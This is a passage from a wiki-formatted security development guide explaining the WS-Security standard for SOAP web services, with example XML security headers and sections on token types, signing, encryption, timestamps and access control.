XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
       &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
